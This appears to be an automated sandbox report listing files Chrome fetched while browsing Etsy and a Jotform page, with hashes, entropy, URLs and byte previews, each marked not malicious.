                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                              Entropy (8bit):3.75
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E1C8540622C481A1ACE2AA9CEED8AEA4
                                                                                                                                                                              SHA1:F93F0FCE318B688A121DC1AB8888CC969C36A82F
                                                                                                                                                                              SHA-256:181201523AA44EF1B41FA04E9A488004CF520D3FAF19F6F1298D8D3A20D9953A
                                                                                                                                                                              SHA-512:C6A1E1D8703E239B59B1B22CE1A991F0E75F83E63FCF8DFE55446DFCA29E9679A6F2A8CA4CFAF928ED59F88AD95072F9AC65925815E3A1A6CDF4163F3B15875D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAllQ2tt5EiathIFDabeMH0=?alt=proto
                                                                                                                                                                              Preview:CgkKBw2m3jB9GgA=
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):9753
                                                                                                                                                                              Entropy (8bit):7.962116501868863
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:37841BE936F185A028347CCCA2349CA2
                                                                                                                                                                              SHA1:6E71646EF5D54FB66ED17F8A541A577D141347D8
                                                                                                                                                                              SHA-256:0EF431240EE4842AA112C5B7A1E8CDD6B96D08D1C55C9870438991F972D97B98
                                                                                                                                                                              SHA-512:606D164D7648CDB29C35CB805394DEECAB11BBC54FD4D387BF0A34246AA936D7BCBFF7C10D7E007DBFF02EC0C8041FACA143184A92C6C112B3F4076B25B089F7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/c7a26f/6045669718/iap_200x200.6045669718_2vndxord.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................%....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe................pixi............ipma.................%.mdat......... !..2.I.p.E.Q@.GM.wt.....N.rUD.ob.B.........+...N.O...:P...V|_q.......,x....x..W.P..<U.h.IV......Mb...v.....r..[..['......Vj..a...0....t.....(.......)............U.U....'hs[....%.O.D..s.{C...m.e=...,.Z.....):#........'2C..(:.}.'.F...N=6K3E.L.p.pP..n,...C...@....g.8...=.:.r3...G..*P>..%....%.....pOc:..0..4.G.v...Y...w..~.@h..^~...P...~8..ZS...M..Y..^\h..s...........B.`..(U.....J...L.......p.$5q.N...`......!.|S\z..w./..:......UJ..\.c^. 8.a...{3....N.C.$q7..r].g CR.&...W.q...K-b?).A.{.}..}>\...OD. .,.p.3b.../.]B.L......SLU.`b.J..(l#.*pC?*..-N.;....$1...$..,kc.M]r...%w-^1$..TO.g......:.....n?.......u......7..y.o..d\l.......^%d.......7..d....\.s..|.m.....*.z..@.....f....T....y%. 1
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):32
                                                                                                                                                                              Entropy (8bit):3.827819531114783
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8D9AC8C63D36FC15EDFD91B3026388E7
                                                                                                                                                                              SHA1:13A521D49256481BACE5A21AC24F9EDE446839CB
                                                                                                                                                                              SHA-256:FF70525A0A5807EA2177B0E0EBA215F17A0409D4E18981A75FAF93B76AE12AFB
                                                                                                                                                                              SHA-512:2B93EB3D2DDA865CB35EFD6885E3C56A6B2BE6EB39D62DEF34F3596E61FA780EC69F82BBC31B36EE0F40093CAB35E7B69DC879F3D7B3F73DEF78A7F9ACD932FE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:{"error": "Resource not found"}.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1525
                                                                                                                                                                              Entropy (8bit):7.552305236706482
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9BE7EF99628E5B8FD909056D9B7432BF
                                                                                                                                                                              SHA1:06FFD304BC4AC3A08842EDBA5364BDBE943BF7C2
                                                                                                                                                                              SHA-256:7BD54CB1D8332A9B6594B82ED4C69B78433EAB66D6C0151A9F289E773521C76E
                                                                                                                                                                              SHA-512:DF9C13D39BDF49124F0413320F48F7182C66D47796D4B1D084FC63F90B51784D5FF1665693B5817A2F7D39289760EDF72017190FFD2CAF6EB2E9006B28DFDCEC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iusa/941837/102222719/iusa_50x50.102222719_1mdz.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......2...2....pixi............ipma...................mdat......q.....2.....$.E..+A(!.U@..;.5.a...&.....i).6..R......\...#'...)Mx..|`7...:W#.G*...J.......1.o^.<V.Y......]........}2..v(}mv.dI.K.3.......#ff.d.v=@..0..._...F.t.>A4Q..v.}.-u"$9)_.E...t.!Er....]st.R.=j...Rr.....I~|F.3J..L..H..m..C]J.l..O...ZCe..V..b.....B..aP.N%.X.....B..H.U...KN.\..)&^..I...L....".~.%......M..dZ,..e3.!.a......<.....w+..^.}.........t../Z..uL.Z.?Ih<..3..S.t..4.E.p.........71.oE...D%.Q..8....,.];]x.Y....i...nu.5+k.X_?...W@.5....).n'.3{$..S.@.........:.>..0M....J&t..cN.%1.@.O.........?...ic.s2.A.R.1\....(.d.....yH.....w..'..:[.(....[.q.&k..zY....x.g.9.....7]..;WU(I.7hL...u.m.GQt.b.I....[..`..S(7..1i.=........'.c...... .:...'.w..O.-.Z..!f.q..B.....y.:Nk....s....C...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):59977
                                                                                                                                                                              Entropy (8bit):7.996369560395056
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:625511C95DB3A565D52DC463E83EF991
                                                                                                                                                                              SHA1:B42B39EC34DA5F8E1D297363BEE4D0E13853A6B1
                                                                                                                                                                              SHA-256:D045515A388E7E3C76BA3EC73908BB5942E84BE21A2D8F82C40B2DFA4DE86FF5
                                                                                                                                                                              SHA-512:C033DF4F22F8F6C0818A7772AD1528F976E502695BA62508E9200A9A5DC10A4C7007A5D4FAA38C64556D1283EEFA4472BAB5D23ECF2366FA870BE2333D4B881D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/7738139/r/il/d973e3/5477672234/il_600x600.5477672234_r91j.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................;...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................Cmdat.....&ey_.....2........a@.....%...TT.x.,^.u.$[.].u..,D"...H6....A....T...)). .%t..m..T.Z..m.,..#!%./.J.c.v..5t.;.u..>.T..5~e.E...m..).f.\............c...1Hu*.....0Vi.b.5.O..H..X.),*.6...DZ..1.q.......Q.Kk~......HzR.....G.....i{$+Zx..HEf...3j..j.....rZ.9+q..t.U..G.2...&..i.f..M.m.&;[.j.r...,.35.w...}...,..v..RM._t/...9%6%..4.jt..5..V9j*....)md..J..?.6oYf......<.....AB.?.?0.&Fk.b.l.).B(."8.....9..f..zS.aJ._.Yy..:..A......H..).>_j...[j..mWF+.`f"..2...K2./......6Q...p.$4g,....|.m...h.|.3U.q.|E.LqP.0.l&....Q.e.9....,.-....;..........QgI.f..`.[8w.._.t~.nPq.5.qP...nV."..4...u.@.XBHP....0..b..%........(.\...l..._~.{)....UF..x...G...4...(....6.p=.E..w.$..-.{...lF:.2.^..!.."^.8..3W4..j.^C.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):16342
                                                                                                                                                                              Entropy (8bit):7.931851455770983
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:D429DD2687E27E408B298716DFE84FF5
                                                                                                                                                                              SHA1:71ADEB71F0CD99EEE852E1AF6858D8AC5D39D8E9
                                                                                                                                                                              SHA-256:EB0C1AF17AA23ED0A04B68A2A72DFBC88817167678FC5A3C1595DC21C369EA78
                                                                                                                                                                              SHA-512:E3914F60D0F0CD2D7A74AABB243324BA151ADBF764BDA50CF6B87C82760322650D5EB47383E70D9F99DED87AA8A359397153ACBDC87E5E47410A2C5618EF546C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd........T..".........................................K.........................!1.AQ.aq.."2....BRb....#r..$4CDT......3Sc..%U5...................................8........................!1..AQRaq."B....#2S...r.3Cc...............?...k.6.I.i.qj.AF.D..(6.m#v..:.E.D?..D.I....x.Q%...%>n.p..d6..ce...*k.8
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):10693
                                                                                                                                                                              Entropy (8bit):7.962807119591908
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6DB3E8AB6EF65EA054DF3D3B3A4A99B7
                                                                                                                                                                              SHA1:4291AA879479AFCF9DED6120472D527AC7900732
                                                                                                                                                                              SHA-256:288DEB19F0F14EDD392C4E8324A0ED0432BABE8EDC116253F80A570CA3214D26
                                                                                                                                                                              SHA-512:B4EAD350F622AF90D073D5B55B81E3D4E624E5A04C8BBFC67869E3AF26FB55346D42A2B698376F7224CD3357C063C14FCFEC1DF0E7777E136C0BCCF32433F37B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/ij/27a778/5598414494/ij_300x300.5598414494_ltnhwp7f.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................(....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma.................(.mdat....."%r....4 2.QD\.QE.P.^....I.......%kc.e..,H....5V.Ix..."......1MGwP?.D.4}....X.4 ...F....|..F...y.l.....B.Z.P....6.......`.Gl.F2v1...v\...3...l.JD.K.^..+@...#.....>.K .q.....!f...5&n.K......HJh;..6d.<.4.n.Y..,#.l.&....k.....F.=_.s...f...v.%......Ep.Y....B..?B....W]=....+/..Qp".w@./...,......}....l.)Dm.D.3.8bQb.]...e*R.....Rp......=...~...T...RF.....i...OH?...6'}.).R......$.zP11.Q%.C.9..z...yK.`...8.Ps..1.#..~g..Z...0h.$7|^<l~.i.....Hid.].Gz.. ..$-X....%.&..mI.5.>|........#.P0....lw.......~...$.D$....D.d._............q..xY..%......F.H.f6.v#..3...5q.....v..{B.7.Zm/....*..R../?.. 6..=o&..<o..s..\d..1....Zm..|.\........^U...Y.RUPV..E......21.X.irE.6...#AMT...u.e..'..7...Li.....B.w.o.e&.).
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):62522
                                                                                                                                                                              Entropy (8bit):7.9459225583753685
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2044A0DECCF37A912A196FFA99A007D0
                                                                                                                                                                              SHA1:F0DA33564CC49F49F425287E889D263D6E425A4F
                                                                                                                                                                              SHA-256:01B1F08552574BC129697898F05B6AE6F98149E56541E7A06CA8466A4C81FAD5
                                                                                                                                                                              SHA-512:E93A5C2DA27D596DF5A82137E553B6923DB06BF8695E886D3A9907DF2D73DEB22AE4B5A09AE8CA163EA14E3816A770E2B378E04A93F0780231310312FAA03A14
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................G.......................!..1AQ."aq..2.....#B..Rb...$3r...S...%Cc...56................................6.....................!1..AQ.aq"..2...BR..r..#3b...C.............?.....hq.Q!I.p.p.R.7.0..=......3u.T....d..x....4X<..F.@....O4.b.q5..Mz...t.ZI
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 32432, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):32432
                                                                                                                                                                              Entropy (8bit):7.992531505212164
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:083C526531FA38F4D67D09B5B4B7A41C
                                                                                                                                                                              SHA1:90EECC0DD8374548E9A6825B2135505080DF415D
                                                                                                                                                                              SHA-256:733C3110F18E2329620AB9C6509B63A09BFA077D1847F9D8749977C936DF1C73
                                                                                                                                                                              SHA-512:2A86FE9A65F4EE411E50FF485E2B47CF9D113905EB3441AF0B5B3922A37067F1CEEE2001699889CF3D0718934539235B511C222D7D522A316E990ECD363B218B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/assets/type/Graphik-Medium-Web.woff2
                                                                                                                                                                              Preview:wOF2......~...........~Q...........................j....`..B.H..s.....H.....V..6.$..(. ..c. ..l[pbq.....t'p.Z._<_....$*k.^.,+.....p..8...3.J...$..7.o.........]..k.jv[...kZ.z......`.@....'.S..v....F./H.Xnl.+.D0Q..AL.....f._...%.Q.........E.......JT|./SFLPR......M......;?.........pI..@..rlN.d..I...'....O..6....g>......^.r.\..#.........P..i?.P..T.I.R....o..^|._..(..B.q.....w.....>BP9.)V~.Sg.t...=.....V......s_Q...xd......[...:..O9.....$..".-S.;.......@z.=.t.>/...... ....F....0.@.D3.{...:....x.....v......Q.D..., ....(...^.}.:..J{..G.'Qc.).......|I..4..<...+..#...I..s...v.~@..ru.U]8.2..U...@$.~..52..N...........!0.....A....4..4z.Y..?.;/.}...Y.....d.t+.BU a#..CV.gu.uOMG...b.C...kMz.n...... .f....^A.........W$22..DZ"--%%%.Sr...../..O..zp...@T.....<B.3.}l.W...iSD.I?).....5...oS3...d.$.v.!......%.....U..S.t.Y....p.Vsv:.%...L.v80.eT....~Oc.....Ig=.t...X8E:.73 0o0..D.|......+.K[\.K|...AI.!..H*r3.,9.|....>.b........gZ.)n..M....).t6......Nn.U......Y
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):43037
                                                                                                                                                                              Entropy (8bit):7.99444232965894
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5F3D649F2E6E41270C1C3D027E8CB3F3
                                                                                                                                                                              SHA1:A70EC6B67DEF59FB147A58735AA82B86203F159D
                                                                                                                                                                              SHA-256:94A021F13E23F87B1B48F2B678A1B91143A48A477DBFBA2E012AF7AB0A403E19
                                                                                                                                                                              SHA-512:F5A53D46DA629FF2DA02D899A36A76AB9666E915FB5C8546EF98E2BB84B6983666FBDBD3FA0CD4A230DBF8994EB0BFDAA296576C9F9DECA0B44A5C4CCCC4BD5F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/b0dcaa/5544409436/iap_600x600.5544409436_2fwlmuxs.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2.... ...A@..~}.u..$=Fk....E.5.O.p~'D....1..J..vc..+.%...9........Q.j.R....'.4..:V.uQ.'.9,.>..&x...x..f.}.=.....U.,.....*...`...R2....3.<a.1.u.......k.+.S."iZ.6..]..l.... 8..,'.&....7C...i{ .....L.l.S.!^.*e.fy.q........1H.Q!e.J+.x...S.......1L8....im....}.NJ.}...].".HD(.g...-..9._.s.tZ...../q.....`...0{......../I.o.....V7........(~Pi....Nj1.0......bx.q........H...e\:....(,....&4.......a...-..k.H......0..N..l\.J./.A...W;k_....1..A$..&.H-cQ...U8..+e.'...a..#....q.,...S..7..,.......M...i-.4.[xd..#..`..I...=.Z.o!.....J.`...m...mN..n............v....,..C..V. ...]2.t...(.[H..r-..4b.E..<..+`..B}..>Xu.Jb{...G....1:...@.9.e!...k.......aI.'.I....q.Xv0H..z.....\..1.<"..&....z.e..W
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):103558
                                                                                                                                                                              Entropy (8bit):7.997883849559587
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:FE61DFF452C76E370BDC3465BD9C2278
                                                                                                                                                                              SHA1:9E3E15DD32A115A6ACDADDCF8182315C86709DCA
                                                                                                                                                                              SHA-256:EED1ED1FD148DB5B3674AEFAAC67DFCADA7B07D269DBB154A6C6D9D5658AAD09
                                                                                                                                                                              SHA-512:899250E140ACA99EB11F5BA039455759EAB50594227CF8739EDB3D7ED0805A8BA72D7D4E75EB4A3D426AD3C5FB9A9EED264CA1373D81AA5A54F9637BE35A501B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/969f94/5423104982/il_794xN.5423104982_92dw.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................x...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe...........#....pixi............ipma...................mdat.....f..E.....2.......!@...I..K.."C...........ZM..[X.i...NC...b..mSgA)...U.............K.nj..2.HV.z...C.N..&.1.Z{...._...l.....3..=....L.....^/.i&.Y....^..-...}.*.....mAl...6t..&....xi..<y..b.}..Hb.-."..[..b7{.7.Z.Y..O ..0Z.<}-.QO.Q......~.."FT.ri+...e..8.s......\@.`.....N........]t...'.Oo...M.:..C6[......F..9&cg..!8a.).[`..-.\...4 .@$(.%!u.T..?...H.d..x. . ........=...hF\..Z2.9b5L..c........u.L."...x.z..f.~...W[._.%...1.N...t..Y..F0.P.~...<P..D..9f....Q.N6..{....`..S.s..e0.. .~!DoH..u.rl. [...6O....!M..-`.....$iF.q....oE...Q......^.iTI;.H...P....Za.J"!7.Y...~...b0X.....%.....G0%W.?J..7.(Y.8..t..z.2.@.]....j.,.n.ce>.....p.0.^.ux..8....c8#v4.:.....c.BY..zJg..[4e..|....R'!...}2.5'.....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):70508
                                                                                                                                                                              Entropy (8bit):7.996809000324924
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0AEC7AE073D78DA02A9B87602C342DFA
                                                                                                                                                                              SHA1:DE2C9FC44CDE19A8639EDE15AAD2A8E961338C4B
                                                                                                                                                                              SHA-256:DDB80620459612783EBEAA590FDC301D320ABB97163EAD4DF3D828571B0DA030
                                                                                                                                                                              SHA-512:F0696BFA756BE4AF6F57CB72FEA2814B6F7652835F0261D47BEA5860C9F747AF402B440D0CDE920226FD6DBFD58A4AFABE5391248706E45440094AE915CDC963
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/352ad1/5819684751/iap_600x600.5819684751_a5s95ypq.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................^...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................fmdat.....&ey_.....2...p.E.Q@..YHT_.Z..%`j.........^...<-...4.....;..u.U^........U........B.r;..b.A.#GC.> .L.Wh...m.~...I.[..v5.H..h.B.^.m<.......d9..{..&......gu..rDL... ....Y.IR.|...H^....Dex.4........`....^7.x...].1._Hh.E.t.V....$C..aee._.:..P.F"..i..... .J....P...o7.........]..'..OY.$.....a......+..Oc..J.]...,^..=.....\.i.../...%....X..H......W.t...a...8..=.5..L>.d..T.1....v...k4..@W]1..~.I.....,|F...;...FZ..%'?.E...4. .*.}.....i)S..,..{....bx....mH.w$.[6(.p+fuA.*m........m`p..z..G*.........qh.....9.2.jAM...*..,V...].....6...u..k.<..<...b..vS.P.....[fq..V.o...r.`..|e.....o..a.D.=z.<%..Y...O..HI."A.?..}.U..k..Ic.....nv.....z0.3...Nb.C5....d.t... .f..=z?..4..}%..!..#.K.*..._2{.G.).....)?
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65390)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):869812
                                                                                                                                                                              Entropy (8bit):5.476882760046679
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9F212508FFB384F76BD38ABFE1D08AD9
                                                                                                                                                                              SHA1:DB47F9B344BD2D88235C75EB4A9CB4DD82762850
                                                                                                                                                                              SHA-256:ABCD071897EB39FE2B87893EEFC849756B0CEF3B38BC8EC6F10895FDEAD4EF35
                                                                                                                                                                              SHA-512:EA177E545E2BE4DB71B320E1677546EA22B5EAE56E2073811900D0BD50CB43F7943EEC9F1C912DB6C02313FDF86F2C1B0C2BDC7E21DA3EE450A5D064973297DC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/search2_neu/desktop/base.b32449ed7597b6059b00.js
                                                                                                                                                                              Preview:// For license information, please see: https://www.etsy.com/ac/evergreenVendor/js/en-US/search2_neu/desktop/base.b32449ed7597b6059b00.js.LICENSE.(()=>{var e={89381:function(e,t,i){var s,n;(function(r,o){true&&!(s=[i(99019)],n=function(e){return o(r,e)}.apply(t,s),void 0!==n&&(e.exports=n))})("undefined"!==typeof window?window:this,(function(e,t){"use strict";var i=e.document;var s="__pz__";var n=Array.prototype.slice;var r=/trident\/7./i;var o=function(){if(r.test(navigator.userAgent))return false;var e=i.createElement("input");e.setAttribute("oninput","return");return"function"===typeof e.oninput}();var a=/([A-Z])/g;var l=/^http:[\w\.\/]+svg$/;var u="(\\-?\\d[\\d\\.e-]*)";var c="\\,?\\s*";var d=new RegExp("^matrix\\("+u+c+u+c+u+c+u+c+u+c+u+"\\)$");function h(e,t){var i=e.length;while(--i)if(Math.round(+e[i])!==Math.round(+t[i]))return false;return true}function p(e){var i={range:true,animate:true};"boolean"===typeof e?i.animate=e:t.extend(i,e);return i}function m(e,i,s,n,r,o,a,l,u){"
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):55673
                                                                                                                                                                              Entropy (8bit):7.994925478694983
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:40024B3CD7EA4C21F8CD20EF9E3CC7D6
                                                                                                                                                                              SHA1:F8F8C3F42CD2B0634714CF501011AA7FE6EB68EE
                                                                                                                                                                              SHA-256:E52E2973781501ABF08F46BFB3A208CF41D78EDA18D74A275C3B159464593ED8
                                                                                                                                                                              SHA-512:47DA5A04779A772FD5F47FC3D05FBFB2ECFEA15D36DD78EDE0E10DF11C01692E14343349639333AFE003FD869EAAB35017B3A7D32D8FC1807D908F617BF96AE1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/f61b20/5513032826/iap_600x600.5513032826_gp7xd8rb.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................k...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma..................smdat.....&ey_.....2.......!@.......D....x.oe......4...6....f...60.S.bi.t.e....h..S.u....T}.....9...V.HH..4.c.o......cH.n.....0REL.].X.U.`pjI.d...,.......7..e^......1.mlYvt......%.$3BW.M.t.w.c.m.G.laI.O.jx..F.....-68z.9}..v.bz..#j.l=.r.P}..H.............q....9..7x.A-../>.;..F......z..L~V.....B.W..5t.i.X.y.......b.....y....}.....#.&.....P....~..O.|.Y....l.,.......G...j.\.-..i....l..P.#6..:0|..}.kV...W90z.5..@..q.Kl.H...l...,."9....*.../...^..=!Q...x...]..|...qz.L..'j......w.4&.$U.al.....d....q..h~A.h.......F.Kf...eg.sA.^..F..\_.r_Fez.c.l........^J...i..{.u...k....E..UX#R..%.Q....j...+=T...H...3~.&%. ......`w..\Z.U.V.|8.z.^......D5v...hM.ZD..I<.....g..../.Mm@ .ey...-sO.......<n..K.m,.;l..%.g
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (6048)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):660829
                                                                                                                                                                              Entropy (8bit):5.345784993164716
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1E0C2E60AA7C07EC200D3AE2750302D7
                                                                                                                                                                              SHA1:D9E7AE798B1F9BC587BD80F5A68905DC9CE44CBD
                                                                                                                                                                              SHA-256:942DAA77587925160559D6AE330D383C4C8D71FECEA24F662A8E01832C17C74B
                                                                                                                                                                              SHA-512:88D3C2EF6720B96EB0ED1591E3CAE5B081E4E2FED53F24D7263666DFC690691940FC10AC31F33EA946F56283A6092B8E3C7CE9EEEF3916A9DAB29E3F987FE142
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://cdn03.jotfor.ms/static/jotform.forms.js?v=3.3.57813
                                                                                                                                                                              Preview:if(window.console===undefined){if(!window.console||!console.firebug){(function(m,i){window.console={};var e=function(){};while(i--){window.console[m[i]]=e;}})('log debug info warn error assert dir dirxml trace group groupEnd time timeEnd profile profileEnd count'.split(' '),16);}.window.console.error=function(e){throw(e);};}.window.requestAnimFrame=(function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(callback){window.setTimeout(callback,1000/60);};})();if(window.Prototype===undefined){throw("Error:prototype.js is required by protoplus.js. Go to prototypejs.org and download lates version.");}.Protoplus={Version:"0.9.9",exec:function(code){return eval(code);},REFIDCOUNT:100,references:{},getIEVersion:function(){var rv=-1;if(navigator.appName=='Microsoft Internet Explorer').{var ua=navigator.userAgent;var re=new RegExp("MSIE ([0-9]{1,}[\\.0-9]{0,})");if(
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 340x270, components 3
